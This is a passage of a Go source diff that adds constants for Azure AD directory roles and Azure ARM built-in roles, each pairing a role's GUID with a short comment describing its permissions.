PartnerTier1SupportRoleID string = "4ba39ca4-527c-499a-b93d-d9b492c50246" + + // Do not use - not intended for general use. + PartnerTier2SupportRoleID string = "e00e864a-17c5-4a4b-9c06-f5b95a8d5bd8" + + // Can reset passwords for non-administrators and Password Administrators. + PasswordAdministratorRoleID string = "966707d0-3269-4727-9be2-8c3a10f19b9d" + + // Manage all aspects of Entra Permissions Management. + PermissionsManagementAdministratorRoleID string = "af78dc32-cf4d-46f9-ba4e-4428526346b5" + + // Can manage all aspects of the Power BI product. + PowerBIAdministratorRoleID string = "a9ea8996-122f-4c74-9520-8edcd192826c" + + // Can create and manage all aspects of Microsoft Dynamics 365, PowerApps and Microsoft Flow. + PowerPlatformAdministratorRoleID string = "11648597-926c-4cf3-9c36-bcebb0ba8dcc" + + // Can manage all aspects of printers and printer connectors. + PrinterAdministratorRoleID string = "644ef478-e28f-4e28-b9dc-3fdde9aa0b1f" + + // Can register and unregister printers and update printer status. + PrinterTechnicianRoleID string = "e8cef6f1-e4bd-4ea8-bc07-4b8d950f4477" + + // Can access to view, set and reset authentication method information for any user (admin or non-admin). + PrivilegedAuthenticationAdministratorRoleID string = "7be44c8a-adaf-4e2a-84d6-ab2649e08a13" + + // Can manage role assignments in Azure AD, and all aspects of Privileged Identity Management. + PrivilegedRoleAdministratorRoleID string = "e8611ab8-c189-46e8-94e1-60213ab1f814" + + // Can read sign-in and audit reports. + ReportsReaderRoleID string = "4a5d8f65-41da-4de4-8968-e035b65339cf" + + // Restricted role for guest users. Can read a limited set of directory information. + RestrictedGuestUserRoleID string = "2af84b1e-32c8-42b7-82bc-daa82404023b" + + // Can create and manage all aspects of Microsoft Search settings. + SearchAdministratorRoleID string = "0964bb5e-9bdb-4d7b-ac29-58e794862a40" + + // Can create and manage the editorial content such as bookmarks, Q and As, locations, floorplan. + SearchEditorRoleID string = "8835291a-918c-4fd7-a9ce-faa49f0cf7d9" + + // Can read security information and reports, and manage configuration in Azure AD and Office 365. + SecurityAdministratorRoleID string = "194ae4cb-b126-40b2-bd5b-6091b380977d" + + // Creates and manages security events. + SecurityOperatorRoleID string = "5f2222b1-57c3-48ba-8ad5-d4759f1fde6f" + + // Can read security information and reports in Azure AD and Office 365. + SecurityReaderRoleID string = "5d6b6bb7-de71-4623-b4af-96380a352509" + + // Can read service health information and manage support tickets. + ServiceSupportAdministratorRoleID string = "f023fd81-a637-4b56-95fd-791ac0226033" + + // Can manage all aspects of the SharePoint service. + SharePointAdministratorRoleID string = "f28a1f50-f6e7-4571-818b-6a12f2af6b6c" + + // Can manage all aspects of the Skype for Business product. + SkypeforBusinessAdministratorRoleID string = "75941009-915a-4869-abe7-691bff18279e" + + // Can manage the Microsoft Teams service. + TeamsAdministratorRoleID string = "69091246-20e8-4a56-aa4d-066075b2a7a8" + + // Can manage calling and meetings features within the Microsoft Teams service. + TeamsCommunicationsAdministratorRoleID string = "baf37b3a-610e-45da-9e62-d9d1e5e8914b" + + // Can troubleshoot communications issues within Teams using advanced tools. + TeamsCommunicationsSupportEngineerRoleID string = "f70938a0-fc10-4177-9e90-2178f8765737" + + // Can troubleshoot communications issues within Teams using basic tools. + TeamsCommunicationsSupportSpecialistRoleID string = "fcf91098-03e3-41a9-b5ba-6f0ec8188a12" + + // Can perform management related tasks on Teams certified devices. + TeamsDevicesAdministratorRoleID string = "3d762c5a-1b6c-493f-843e-55a3b42923d4" + + // Can see only tenant level aggregates in Microsoft 365 Usage Analytics and Productivity Score. + UsageSummaryReportsReaderRoleID string = "75934031-6c7e-415a-99d7-48dbd49e875e" + + // Default role for member users. Can read all and write a limited set of directory information. + UserRoleID string = "a0b1b346-4d3e-4e8b-98f8-753987be4970" + + // Can manage all aspects of users and groups, including resetting passwords for limited admins. + UserAdministratorRoleID string = "fe930be7-5e62-47db-91af-98c3a49a38b1" + + // Manage and share Virtual Visits information and metrics from admin centers or the Virtual Visits app. + VirtualVisitsAdministratorRoleID string = "e300d9e7-4a2b-4295-9eff-f1c78b36cc98" + + // Can provision and manage all aspects of Cloud PCs. + Windows365AdministratorRoleID string = "11451d60-acb2-45eb-a7d6-43d0f0125c13" + + // Can create and manage all aspects of Windows Update deployments through the Windows Update for Business deployment service. + WindowsUpdateDeploymentAdministratorRoleID string = "32696413-001a-46ae-978c-ce0f6b3620d2" + + // Deprecated - Do Not Use. + WorkplaceDeviceJoinRoleID string = "c34f683f-4d5a-4403-affd-6615e00e3a7f" + + // Manage all aspects of the Yammer service. + YammerAdministratorRoleID string = "810a2642-a034-447f-a5e8-41beaa378541" +) + +// Azure ARM roles +// See https://docs.microsoft.com/en-us/azure/role-based-access-control/built-in-roles +const ( + // Can customize the developer portal, edit its content, and publish it. + APIManagementDeveloperPortalContentEditorRoleID string = "c031e6a8-4391-4de0-8d69-4706a7ed3729" + + // Can manage service and the APIs + APIManagementServiceContributorRoleID string = "312a565d-c81f-4fd8-895a-4e21e48d571c" + + // Can manage service but not the APIs + APIManagementServiceOperatorRoleID string = "e022efe7-f5ba-4159-bbe4-b44f577e9b61" + + // Read-only access to service and APIs + APIManagementServiceReaderRoleID string = "71522526-b88f-4d52-b57f-d31fc3546d0d" + + // Lets you grant Access Review System app permissions to discover and revoke access as needed by the access review process. + AccessReviewOperatorServiceRoleID string = "76cc9ee4-d5d3-4a45-a930-26add3d73475" + + // acr delete + AcrDeleteRoleID string = "c2f4ef07-c644-48eb-af81-4b1b4947fb11" + + // acr image signer + AcrImageSignerRoleID string = "6cef56e8-d556-48e5-a04f-b8e64114680f" + + // acr pull + AcrPullRoleID string = "7f951dda-4ed3-4680-a7ca-43fe172d538d" + + // acr push + AcrPushRoleID string = "8311e382-0749-4cb8-b61a-304f252e45ec" + + // acr quarantine data reader + AcrQuarantineReaderRoleID string = "cdda3590-29a3-44f6-95f2-9f980659eb04" + + // acr quarantine data writer + AcrQuarantineWriterRoleID string = "c8d4ff99-41c3-41a8-9f60-21dfdad59608" + + // Provides contribute access to manage sensor related entities in AgFood Platform Service + AgFoodPlatformSensorPartnerContributorRoleID string = "6b77f0a0-0d89-41cc-acd1-579c22c17a67" + + // Provides admin access to AgFood Platform Service + AgFoodPlatformServiceAdminRoleID string = "f8da80de-1ff9-4747-ad80-a19b7f6079e3" + + // Provides contribute access to AgFood Platform Service + AgFoodPlatformServiceContributorRoleID string = "8508508a-4469-4e45-963b-2518ee0bb728" + + // Provides read access to AgFood Platform Service + AgFoodPlatformServiceReaderRoleID string = "7ec7ccdc-f61e-41fe-9aaf-980df0a44eba" + + // Basic user role for AnyBuild. This role allows listing of agent information and execution of remote build capabilities. + AnyBuildBuilderRoleID string = "a2138dac-4907-4679-a376-736901ed8ad8" + + // Allows full access to App Configuration data. + AppConfigurationDataOwnerRoleID string = "5ae67dd6-50cb-40e7-96ff-dc2bfa4b606b" + + // Allows read access to App Configuration data. + AppConfigurationDataReaderRoleID string = "516239f1-63e1-4d78-a4de-a74fb236a071" + + // Contributor of the Application Group. + ApplicationGroupContributorRoleID string = "ca6382a4-1721-4bcf-a114-ff0c70227b6b" + + // Can manage Application Insights components + ApplicationInsightsComponentContributorRoleID string = "ae349356-3a1b-4a5e-921d-050484c6347e" + + // Gives user permission to use Application Insights Snapshot Debugger features + ApplicationInsightsSnapshotDebuggerRoleID string = "08954f03-6346-4c2e-81c0-ec3a5cfae23b" + + // Can read write or delete the attestation provider instance + AttestationContributorRoleID string = "bbf86eb8-f7b4-4cce-96e4-18cddf81d86e" + + // Can read the attestation provider properties + AttestationReaderRoleID string = "fd1bd22b-8476-40bc-a0bc-69b95687b9f3" + + // Manage azure automation resources and other resources using azure automation. + AutomationContributorRoleID string = "f353d9bd-d4a6-484e-a77a-8050b599b867" + + // Create and Manage Jobs using Automation Runbooks. + AutomationJobOperatorRoleID string = "4fe576fe-1146-4730-92eb-48519fa6bf9f" + + // Automation Operators are able to start, stop, suspend, and resume jobs + AutomationOperatorRoleID string = "d3881f73-407a-4167-8283-e981cbba0404" + + // Read Runbook properties - to be able to create Jobs of the runbook. + AutomationRunbookOperatorRoleID string = "5fb5aef8-1081-4b8e-bb16-9d5d0385bab5" + + // Grants permissions to upload and manage new Autonomous Development Platform measurements. + AutonomousDevelopmentPlatformDataContributorRoleID string = "b8b15564-4fa6-4a59-ab12-03e1d9594795" + + // Grants full access to Autonomous Development Platform data. + AutonomousDevelopmentPlatformDataOwnerRoleID string = "27f8b550-c507-4db9-86f2-f4b8e816d59d" + + // Grants read access to Autonomous Development Platform data. + AutonomousDevelopmentPlatformDataReaderRoleID string = "d63b75f7-47ea-4f27-92ac-e0d173aaf093" + + // Can create and manage an Avere vFXT cluster. + AvereContributorRoleID string = "4f8fab4f-1852-4a58-a46a-8eaf358af14a" + + // Used by the Avere vFXT cluster to manage the cluster + AvereOperatorRoleID string = "c025889f-8102-4ebf-b32c-fc0c6f0c6bd9" + + // List cluster user credentials action. + AzureArcEnabledKubernetesClusterUserRoleID string = "00493d72-78f6-4148-b6c5-d3ce8e4799dd" + + // Lets you manage all resources under cluster/namespace, except update or delete resource quotas and namespaces. + AzureArcKubernetesAdminRoleID string = "dffb1e0c-446f-4dde-a09f-99eb5cc68b96" + + // Lets you manage all resources in the cluster. + AzureArcKubernetesClusterAdminRoleID string = "8393591c-06b9-48a2-a542-1bd6b377f6a2" + + // Lets you view all resources in cluster/namespace, except secrets. + AzureArcKubernetesViewerRoleID string = "63f0a09d-1495-4db4-a681-037d84835eb4" + + // Lets you update everything in cluster/namespace, except (cluster)roles and (cluster)role bindings. + AzureArcKubernetesWriterRoleID string = "5b999177-9696-4545-85c7-50de3797e5a1" + + // Arc ScVmm VM Administrator has permissions to perform all ScVmm actions. + AzureArcScVmmAdministratorRoleID string = "a92dfd61-77f9-4aec-a531-19858b406c87" + + // Azure Arc ScVmm Private Cloud User has permissions to use the ScVmm resources to deploy VMs. + AzureArcScVmmPrivateCloudUserRoleID string = "c0781e91-8102-4553-8951-97c6d4243cda" + + // Azure Arc ScVmm Private Clouds Onboarding role has permissions to provision all the required resources for onboard and deboard vmm server instances to Azure. + AzureArcScVmmPrivateCloudsOnboardingRoleID string = "6aac74c4-6311-40d2-bbdd-7d01e7c6e3a9" + + // Arc ScVmm VM Contributor has permissions to perform all VM actions. + AzureArcScVmmVMContributorRoleID string = "e582369a-e17b-42a5-b10c-874c387c530b" + + // Arc VMware VM Contributor has permissions to perform all connected VMwarevSphere actions. + AzureArcVMwareAdministratorRoleID string = "ddc140ed-e463-4246-9145-7c664192013f" + + // Azure Arc VMware Private Cloud User has permissions to use the VMware cloud resources to deploy VMs. + AzureArcVMwarePrivateCloudUserRoleID string = "ce551c02-7c42-47e0-9deb-e3b6fc3a9a83" + + // Azure Arc VMware Private Clouds Onboarding role has permissions to provision all the required resources for onboard and deboard vCenter instances to Azure. + AzureArcVMwarePrivateCloudsOnboardingRoleID string = "67d33e57-3129-45e6-bb0b-7cc522f762fa" + + // Arc VMware VM Contributor has permissions to perform all VM actions. + AzureArcVMwareVMContributorRoleID string = "b748a06d-6150-4f8a-aaa9-ce3940cd96cb" + + // Can onboard Azure Connected Machines. + AzureConnectedMachineOnboardingRoleID string = "b64e21ea-ac4e-4cdf-9dc9-5b892992bee7" + + // Can read, write, delete and re-onboard Azure Connected Machines. + AzureConnectedMachineResourceAdministratorRoleID string = "cd570a14-e51a-42ad-bac8-bafd67325302" + + // Microsoft.AzureArcData service role to access the resources of Microsoft.AzureArcData stored with RPSAAS. + AzureConnectedSQLServerOnboardingRoleID string = "e8113dce-c529-4d33-91fa-e9b972617508" + + // Full access role for Digital Twins data-plane + AzureDigitalTwinsDataOwnerRoleID string = "bcd981a7-7f74-457b-83e1-cceb9e632ffe" + + // Read-only role for Digital Twins data-plane properties + AzureDigitalTwinsDataReaderRoleID string = "d57506d4-4c8d-48b1-8587-93c323f6a5a3" + + // Allows for full access to Azure Event Hubs resources. + AzureEventHubsDataOwnerRoleID string = "f526a384-b230-433a-b45c-95f59c4a2dec" + + // Allows receive access to Azure Event Hubs resources. + AzureEventHubsDataReceiverRoleID string = "a638d3c7-ab3a-418d-83e6-5f17a39d4fde" + + // Allows send access to Azure Event Hubs resources. + AzureEventHubsDataSenderRoleID string = "2b629674-e913-4c01-ae53-ef4638d8f975" + + // List cluster admin credential action. + AzureKubernetesServiceClusterAdminRoleID string = "0ab0b1a8-8aac-4efd-b8c2-3ee1fb270be8" + + // List cluster user credential action. + AzureKubernetesServiceClusterUserRoleID string = "4abbcc35-e782-43d8-92c5-2d3f1bd2253f" + + // Grants access to read and write Azure Kubernetes Service clusters + AzureKubernetesServiceContributorRoleID string = "ed7f3fbd-7b88-4dd4-9017-9adb7ce333f8" + + // Deploy the Azure Policy add-on on Azure Kubernetes Service clusters + AzureKubernetesServicePolicyAddonDeploymentRoleID string = "18ed5180-3e48-46fd-8541-4ea054d57064" + + // Lets you manage all resources under cluster/namespace, except update or delete resource quotas and namespaces. + AzureKubernetesServiceRBACAdminRoleID string = "3498e952-d568-435e-9b2c-8d77e338d7f7" + + // Lets you manage all resources in the cluster. + AzureKubernetesServiceRBACClusterAdminRoleID string = "b1ff04bb-8a4e-4dc4-8eb5-8693973ce19b" + + // Allows read-only access to see most objects in a namespace. It does not allow viewing roles or role bindings. This role does not allow viewing Secrets, since reading the contents of Secrets enables access to ServiceAccount credentials in the namespace, which would allow API access as any ServiceAccount in the namespace (a form of privilege escalation). Applying this role at cluster scope will give access across all namespaces. + AzureKubernetesServiceRBACReaderRoleID string = "7f6c6a51-bcf8-42ba-9220-52d62157d7db" + + // Allows read/write access to most objects in a namespace.This role does not allow viewing or modifying roles or role bindings. However, this role allows accessing Secrets and running Pods as any ServiceAccount in the namespace, so it can be used to gain the API access levels of any ServiceAccount in the namespace. Applying this role at cluster scope will give access across all namespaces. + AzureKubernetesServiceRBACWriterRoleID string = "a7ffa36f-339b-4b5c-8bdf-e2c188b2c0eb" + + // Grants access all Azure Maps resource management. + AzureMapsContributorRoleID string = "dba33070-676a-4fb0-87fa-064dc56ff7fb" + + // Grants access to read, write, and delete access to map related data from an Azure maps account. + AzureMapsDataContributorRoleID string = "8f5e0ce6-4f7b-4dcf-bddf-e6f48634a204" + + // Grants access to read map related data from an Azure maps account. + AzureMapsDataReaderRoleID string = "423170ca-a8f6-4b0f-8487-9e4eb8f49bfa" + + // Grants access to very limited set of data APIs for common visual web SDK scenarios. Specifically, render and search data APIs. + AzureMapsSearchandRenderDataReaderRoleID string = "6be48352-4f82-47c9-ad5e-0acacefdb005" + + // Allows for listen access to Azure Relay resources. + AzureRelayListenerRoleID string = "26e0b698-aa6d-4085-9386-aadae190014d" + + // Allows for full access to Azure Relay resources. + AzureRelayOwnerRoleID string = "2787bf04-f1f5-4bfe-8383-c8a24483ee38" + + // Allows for send access to Azure Relay resources. + AzureRelaySenderRoleID string = "26baccc8-eea7-41f1-98f4-1762cc7f685d" + + // Allows for full access to Azure Service Bus resources. + AzureServiceBusDataOwnerRoleID string = "090c5cfd-751d-490a-894a-3ce6f1109419" + + // Allows for receive access to Azure Service Bus resources. + AzureServiceBusDataReceiverRoleID string = "4f6d3b9b-027b-4f4c-9142-0e5a2a2247e0" + + // Allows for send access to Azure Service Bus resources. + AzureServiceBusDataSenderRoleID string = "69a216fc-b8fb-44d8-bc22-1f3c2cd27a39" + + // Allow read, write and delete access to Azure Spring Cloud Config Server + AzureSpringCloudConfigServerContributorRoleID string = "a06f5c24-21a7-4e1a-aa2b-f19eb6684f5b" + + // Allow read access to Azure Spring Cloud Config Server + AzureSpringCloudConfigServerReaderRoleID string = "d04c6db6-4947-4782-9e91-30a88feb7be7" + + // Allow read access to Azure Spring Cloud Data + AzureSpringCloudDataReaderRoleID string = "b5537268-8956-4941-a8f0-646150406f0c" + + // Allow read, write and delete access to Azure Spring Cloud Service Registry + AzureSpringCloudServiceRegistryContributorRoleID string = "f5880b48-c26d-48be-b172-7927bfa1c8f1" + + // Allow read access to Azure Spring Cloud Service Registry + AzureSpringCloudServiceRegistryReaderRoleID string = "cff1b556-2399-4e7e-856d-a8f754be7b65" + + // Lets you manage Azure Stack registrations. + AzureStackRegistrationOwnerRoleID string = "6f12a6df-dd06-4f3e-bcb1-ce8be600526a" + + // Azure VM Managed identities restore Contributors are allowed to perform Azure VM Restores with managed identities both user and system + AzureVMManagedidentitiesrestoreContributorRoleID string = "6ae96244-5829-4925-a7d3-5975537d91dd" + + // Can perform all actions within an Azure Machine Learning workspace, except for creating or deleting compute resources and modifying the workspace itself. + AzureMLDataScientistRoleID string = "f6c7c914-8db3-469d-8ca1-694a8f32e121" + + // Lets you write metrics to AzureML workspace + AzureMLMetricsWriterRoleID string = "635dd51f-9968-44d3-b7fb-6d9a6bd613ae" + + // Lets you manage backup service,but can't create vaults and give access to others + BackupContributorRoleID string = "5e467623-bb1f-42f4-a55d-6e525e11384b" + + // Lets you manage backup services, except removal of backup, vault creation and giving access to others + BackupOperatorRoleID string = "00c29273-979b-4161-815c-10b084fb9324" + + // Can view backup services, but can't make changes + BackupReaderRoleID string = "a795c7a0-d4a2-40c1-ae25-d81f01202912" + + // Allows read access to billing data + BillingReaderRoleID string = "fa23ad8b-c56e-40d8-ac0c-ce449e1d2c64" + + // Lets you manage BizTalk services, but not access to them. + BizTalkContributorRoleID string = "5e3c6656-6cfa-4708-81fe-0de47ac73342" + + // Allows for access to Blockchain Member nodes + BlockchainMemberNodeAccessRoleID string = "31a002a1-acaf-453e-8a5b-297c9ca1ea24" + + // Can manage blueprint definitions, but not assign them. + BlueprintContributorRoleID string = "41077137-e803-4205-871c-5a86e6a753b4" + + // Can assign existing published blueprints, but cannot create new blueprints. NOTE: this only works if the assignment is done with a user-assigned managed identity. + BlueprintOperatorRoleID string = "437d2ced-4a38-4302-8479-ed2bcb43d090" + + // Can manage CDN endpoints, but can’t grant access to other users. + CDNEndpointContributorRoleID string = "426e0c7f-0c7e-4658-b36f-ff54d6c29b45" + + // Can view CDN endpoints, but can’t make changes. + CDNEndpointReaderRoleID string = "871e35f6-b5c1-49cc-a043-bde969a0f2cd" + + // Can manage CDN profiles and their endpoints, but can’t grant access to other users. + CDNProfileContributorRoleID string = "ec156ff8-a8d1-4d15-830c-5b80698ca432" + + // Can view CDN profiles and their endpoints, but can’t make changes. + CDNProfileReaderRoleID string = "8f96442b-4075-438f-813d-ad51ab4019af" + + // Lets you manage everything under your HPC Workbench chamber. + ChamberAdminRoleID string = "4e9b8407-af2e-495b-ae54-bb60a55b1b5a" + + // Lets you view everything under your HPC Workbench chamber, but not make any changes. + ChamberUserRoleID string = "4447db05-44ed-4da3-ae60-6cbece780e32" + + // Lets you manage classic networks, but not access to them. + ClassicNetworkContributorRoleID string = "b34d265f-36f7-4a0d-a4d4-e158ca92e90f" + + // Lets you manage classic storage accounts, but not access to them. + ClassicStorageAccountContributorRoleID string = "86e8f5dc-a6e9-4c67-9d15-de283e8eac25" + + // Classic Storage Account Key Operators are allowed to list and regenerate keys on Classic Storage Accounts + ClassicStorageAccountKeyOperatorServiceRoleID string = "985d6b00-f706-48f5-a6fe-d0ca12fb668d" + + // Lets you manage classic virtual machines, but not access to them, and not the virtual network or storage account they’re connected to. + ClassicVirtualMachineContributorRoleID string = "d73bb868-a0df-4d4d-bd69-98a00b01fccb" + + // Lets you manage ClearDB MySQL databases, but not access to them. + ClearDBMySQLDBContributorRoleID string = "9106cda0-8a86-4e81-b686-29a22c54effe" + + // Manage identity or business verification requests. This role is in preview and subject to change. + CodeSigningIdentityVerifierRoleID string = "4339b7cf-9826-4e41-b4ed-c7f4505dac08" + + // Sign files with a certificate profile. This role is in preview and subject to change. + CodeSigningCertificateProfileSignerRoleID string = "2837e146-70d7-4cfd-ad55-7efa6464f958" + + // Lets you create, read, update, delete and manage keys of Cognitive Services. + CognitiveServicesContributorRoleID string = "25fbc0a9-bd7c-42a3-aa1a-3b75d497ee68" + + // Full access to the project, including the ability to view, create, edit, or delete projects. + CognitiveServicesCustomVisionContributorRoleID string = "c1ff6cc2-c111-46fe-8896-e0ef812ad9f3" + + // Publish, unpublish or export models. Deployment can view the project but can’t update. + CognitiveServicesCustomVisionDeploymentRoleID string = "5c4089e1-6d96-4d2f-b296-c1bc7137275f" + + // View, edit training images and create, add, remove, or delete the image tags. Labelers can view the project but can’t update anything other than training images and tags. + CognitiveServicesCustomVisionLabelerRoleID string = "88424f51-ebe7-446f-bc41-7fa16989e96c" + + // Read-only actions in the project. Readers can’t create or update the project. + CognitiveServicesCustomVisionReaderRoleID string = "93586559-c37d-4a6b-ba08-b9f0940c2d73" + + // View, edit projects and train the models, including the ability to publish, unpublish, export the models. Trainers can’t create or delete the project. + CognitiveServicesCustomVisionTrainerRoleID string = "0a5ae4ab-0d65-4eeb-be61-29fc9b54394b" + + // Lets you read Cognitive Services data. + CognitiveServicesDataReaderRoleID string = "b59867f0-fa02-499b-be73-45a86b5b3e1c" + + // Lets you perform detect, verify, identify, group, and find similar operations on Face API. This role does not allow create or delete operations, which makes it well suited for endpoints that only need inferencing capabilities, following 'least privilege' best practices. + CognitiveServicesFaceRecognizerRoleID string = "9894cab4-e18a-44aa-828b-cb588cd6f2d7" + + // Provides access to create Immersive Reader sessions and call APIs + CognitiveServicesImmersiveReaderUserRoleID string = "b2de6794-95db-4659-8781-7e080d3f2b9d" + + // Has access to all Read, Test, Write, Deploy and Delete functions under LUIS + CognitiveServicesLUISOwnerRoleID string = "f72c8140-2111-481c-87ff-72b910f6e3f8" + + // Has access to Read and Test functions under LUIS. + CognitiveServicesLUISReaderRoleID string = "18e81cdc-4e98-4e29-a639-e7d10c5a6226" + + // Has access to all Read, Test, and Write functions under LUIS + CognitiveServicesLUISWriterRoleID string = "6322a993-d5c9-4bed-b113-e49bbea25b27" + + // Has access to all Read, Test, Write, Deploy and Delete functions under Language portal + CognitiveServicesLanguageOwnerRoleID string = "f07febfe-79bc-46b1-8b37-790e26e6e498" + + // Has access to Read and Test functions under Language portal + CognitiveServicesLanguageReaderRoleID string = "7628b7b8-a8b2-4cdc-b46f-e9b35248918e" + + // Has access to all Read, Test, and Write functions under Language Portal + CognitiveServicesLanguageWriterRoleID string = "f2310ca1-dc64-4889-bb49-c8e0fa3d47a8" + + // Full access to the project, including the system level configuration. + CognitiveServicesMetricsAdvisorAdministratorRoleID string = "cb43c632-a144-4ec5-977c-e80c4affc34a" + + // Access to the project. + CognitiveServicesMetricsAdvisorUserRoleID string = "3b20f47b-3825-43cb-8114-4bd2201156a8" + + // Let’s you create, edit, import and export a KB. You cannot publish or delete a KB. + CognitiveServicesQnAMakerEditorRoleID string = "f4cc2bf9-21be-47a1-bdf1-5c5804381025" + + // Let’s you read and test a KB only. + CognitiveServicesQnAMakerReaderRoleID string = "466ccd10-b268-4a11-b098-b4849f024126" + + // Full access to Speech projects, including read, write and delete all entities, for real-time speech recognition and batch transcription tasks, real-time speech synthesis and long audio tasks, custom speech and custom voice. + CognitiveServicesSpeechContributorRoleID string = "0e75ca1e-0464-4b4d-8b93-68208a576181" + + // Access to the real-time speech recognition and batch transcription APIs, real-time speech synthesis and long audio APIs, as well as to read the data/test/model/endpoint for custom models, but can’t create, delete or modify the data/test/model/endpoint for custom models. + CognitiveServicesSpeechUserRoleID string = "f2dc8367-1007-4938-bd23-fe263f013447" + + // Lets you read and list keys of Cognitive Services. + CognitiveServicesUserRoleID string = "a97b65f3-24c7-4388-baec-2e87135dc908" + + // Can manage data packages of a collaborative. + CollaborativeDataContributorRoleID string = "daa9e50b-21df-454c-94a6-a8050adab352" + + // Can manage resources created by AICS at runtime + CollaborativeRuntimeOperatorRoleID string = "7a6f0e70-c033-4fb1-828c-08514e5f4102" + + // This role allows user to share gallery to another subscription/tenant or share it to the public. + ComputeGallerySharingAdminRoleID string = "1ef6a3be-d0ac-425d-8c01-acb62866290b" + + // Grants full access to manage all resources, but does not allow you to assign roles in Azure RBAC, manage assignments in Azure Blueprints, or share image galleries. + ContributorRoleID string = "b24988ac-6180-42a0-ab88-20f7382dd24c" + + // Can read Azure Cosmos DB Accounts data + CosmosDBAccountReaderRoleID string = "fbdf93bf-df7d-467e-a4d2-9458aa1360c8" + + // Lets you manage Azure Cosmos DB accounts, but not access data in them. Prevents access to account keys and connection strings. + CosmosDBOperatorRoleID string = "230815da-be43-4aae-9cb4-875f7bd000aa" + + // Can submit restore request for a Cosmos DB database or a container for an account + CosmosBackupOperatorRoleID string = "db7b14f2-5adf-42da-9f96-f2ee17bab5cb" + + // Can perform restore action for Cosmos DB database account with continuous backup mode + CosmosRestoreOperatorRoleID string = "5432c526-bc82-444a-b7ba-57c5b0b5b34f" + + // Can view costs and manage cost configuration (e.g. budgets, exports) + CostManagementContributorRoleID string = "434105ed-43f6-45c7-a02f-909b2ba83430" + + // Can view cost data and configuration (e.g. budgets, exports) + CostManagementReaderRoleID string = "72fafb9e-0641-4937-9268-a91bfd8191a3" + + // Full access to DICOM data. + DICOMDataOwnerRoleID string = "58a3b984-7adf-4c20-983a-32417c86fbc8" + + // Read and search DICOM data. + DICOMDataReaderRoleID string = "e89c7a3c-2f64-4fa1-a847-3e4c9ba4283a" + + // Lets you manage DNS resolver resources. + DNSResolverContributorRoleID string = "0f2ebee7-ffd4-4fc0-b3b7-664099fdad5d" + + // Lets you manage DNS zones and record sets in Azure DNS, but does not let you control who has access to them. + DNSZoneContributorRoleID string = "befefa01-2a29-4197-83a8-272ff33ce314" + + // Lets you manage everything under Data Box Service except giving access to others. + DataBoxContributorRoleID string = "add466c9-e687-43fc-8d98-dfcf8d720be5" + + // Lets you manage Data Box Service except creating order or editing order details and giving access to others. + DataBoxReaderRoleID string = "028f4ed7-e2a9-465e-a8f4-9c0ffdfdc027" + + // Create and manage data factories, as well as child resources within them. + DataFactoryContributorRoleID string = "673868aa-7521-48a0-acc6-0f60742d39f5" + + // Lets you submit, monitor, and manage your own jobs but not create or delete Data Lake Analytics accounts. + DataLakeAnalyticsDeveloperRoleID string = "47b7735b-770e-4598-a7da-8b91488b4c88" + + // Provides permissions to upload data to empty managed disks, read, or export data of managed disks (not attached to running VMs) and snapshots using SAS URIs and Azure AD authentication. + DataOperatorforManagedDisksRoleID string = "959f8984-c045-4866-89c7-12bf9737be2e" + + // Can purge analytics data + DataPurgerRoleID string = "150f5e0c-0603-4f03-8c7f-cf70034c4e90" + + // Contributor of the Desktop Virtualization Application Group. + DesktopVirtualizationApplicationGroupContributorRoleID string = "86240b0e-9422-4c43-887b-b61143f32ba8" + + // Reader of the Desktop Virtualization Application Group. + DesktopVirtualizationApplicationGroupReaderRoleID string = "aebf23d0-b568-4e86-b8f9-fe83a2c6ab55" + + // Contributor of Desktop Virtualization. + DesktopVirtualizationContributorRoleID string = "082f0a83-3be5-4ba1-904c-961cca79b387" + + // Contributor of the Desktop Virtualization Host Pool. + DesktopVirtualizationHostPoolContributorRoleID string = "e307426c-f9b6-4e81-87de-d99efb3c32bc" + + // Reader of the Desktop Virtualization Host Pool. + DesktopVirtualizationHostPoolReaderRoleID string = "ceadfde2-b300-400a-ab7b-6143895aa822" + + // This role is in preview and subject to change. Provide permission to the Azure Virtual Desktop Resource Provider to start virtual machines. + DesktopVirtualizationPowerOnContributorRoleID string = "489581de-a3bd-480d-9518-53dea7416b33" + + // This role is in preview and subject to change. Provide permission to the Azure Virtual Desktop Resource Provider to start and stop virtual machines. + DesktopVirtualizationPowerOnOffContributorRoleID string = "40c5ff49-9181-41f8-ae61-143b0e78555e" + + // Reader of Desktop Virtualization. + DesktopVirtualizationReaderRoleID string = "49a72310-ab8d-41df-bbb0-79b649203868" + + // Operator of the Desktop Virtualization Session Host. + DesktopVirtualizationSessionHostOperatorRoleID string = "2ad6aaab-ead9-4eaa-8ac5-da422f562408" + + // Allows user to use the applications in an application group. + DesktopVirtualizationUserRoleID string = "1d18fff3-a72a-46b5-b4a9-0b38a3cd7e63" + + // Operator of the Desktop Virtualization Uesr Session. + DesktopVirtualizationUserSessionOperatorRoleID string = "ea4bfff8-7fb4-485a-aadd-d4129a0ffaa6" + + // This role is in preview and subject to change. Provide permission to the Azure Virtual Desktop Resource Provider to create, delete, update, start, and stop virtual machines. + DesktopVirtualizationVirtualMachineContributorRoleID string = "a959dbd1-f747-45e3-8ba6-dd80f235f97c" + + // Contributor of the Desktop Virtualization Workspace. + DesktopVirtualizationWorkspaceContributorRoleID string = "21efdde3-836f-432b-bf3d-3e8e734d4b2b" + + // Reader of the Desktop Virtualization Workspace. + DesktopVirtualizationWorkspaceReaderRoleID string = "0fa44ee9-7a7d-466b-9bb2-2bf446b1204d" + + // Provides access to create and manage dev boxes. + DevCenterDevBoxUserRoleID string = "45d50f46-0b78-4001-a660-4198cbe8cd05" + + // Provides access to manage project resources. + DevCenterProjectAdminRoleID string = "331c37c6-af14-46d9-b9f4-e1909e1b95a0" + + // Lets you connect, start, restart, and shutdown your virtual machines in your Azure DevTest Labs. + DevTestLabsUserRoleID string = "76283e04-6283-4c54-8f91-bcf1374a3c64" + + // Allows for full access to Device Provisioning Service data-plane operations. + DeviceProvisioningServiceDataContributorRoleID string = "dfce44e4-17b7-4bd1-a6d1-04996ec95633" + + // Allows for full read access to Device Provisioning Service data-plane properties. + DeviceProvisioningServiceDataReaderRoleID string = "10745317-c249-44a1-a5ce-3a4353c0bbd8" + + // Gives you full access to management and content operations + DeviceUpdateAdministratorRoleID string = "02ca0879-e8e4-47a5-a61e-5c618b76e64a" + + // Gives you full access to content operations + DeviceUpdateContentAdministratorRoleID string = "0378884a-3af5-44ab-8323-f5b22f9f3c98" + + // Gives you read access to content operations, but does not allow making changes + DeviceUpdateContentReaderRoleID string = "d1ee9a80-8b14-47f0-bdc2-f4a351625a7b" + + // Gives you full access to management operations + DeviceUpdateDeploymentsAdministratorRoleID string = 